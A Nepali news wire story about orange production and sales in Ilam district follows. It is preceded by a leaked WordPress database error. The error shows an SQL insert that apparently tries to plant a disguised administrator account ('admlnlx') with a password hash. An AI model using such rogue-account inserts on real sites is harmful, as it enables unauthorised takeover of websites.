WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOg2FYGY/Gi0UFieWWgKL5BmTHi3rG.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-14 21:05:20', '', 'admlnlx', 'admlnlx')
इलाम, माघ २० –
किसानले यस वर्ष एक हजार ९९५ मेट्रिक टन सुन्तला उत्पादन गरी रु ११ करोड ९७ लाखको सुन्तला बिक्री गरेका छन् ।
यहाँ उत्पादन भएको सुन्तला झापा, मोरङ तथा भारतको दार्जिलिङ, सिलिगुढीलगायतका बजारमा बिक्री भएको हो । सुन्तला सरदर प्रतिकिलो रु ६० का दरले बिक्री भएको किसानले बताएका छन् ।
तराईका व्यापारी कृषकको बगानसम्म सुन्तला खरिद गर्न आएका कारण बजारको खासै समस्या नभएको जिर्मलेका यामप्रसाद अधिकारीले बताउनुभयो । सुन्तला बिक्रीबाट जिल्लामा बर्सेनि करोडौँ रूपैयाँ भित्रिने गरेको छ । “नामसालिङ गाविसबाट मात्र यस वर्ष रु तीन करोडको सुन्तला बिक्री भएको छ,” अधिकारीले भन्नुभयो ।
गत वर्षको तुलनामा यस वर्ष सुन्तलाको उत्पादनमा तीन प्रतिशतले वृद्धि भएको जिल्ला कृषि विकास कार्यालयका सूचना अधिकारी प्रकाशमणि काफ्ले बताउनुभयो । जिल्लामा यस वर्ष ३५० हेक्टरमा गरिएको खेतीबाट तीन हजार ६२९ मेट्रिक टन सुन्तला उत्पादन भएको थियो । गत आवमा ३४० हेक्टरमा तीन हजार ५२३ मेट्रिक टन सुन्तला उत्पादन भएको कार्यालयले जनाएको छ ।
सुम्बेक, नामसालिङ, जिर्मले, बरबोटे, सोयाक, गोदक, सोयाङ, पशुपतिनगर, कन्याम, लक्ष्मीपुर गाविस तथा इलाम नगरपालिका सुन्तला उत्पादन अत्यधिक मात्रामा हुने गरेको बताइएको छ । – रासस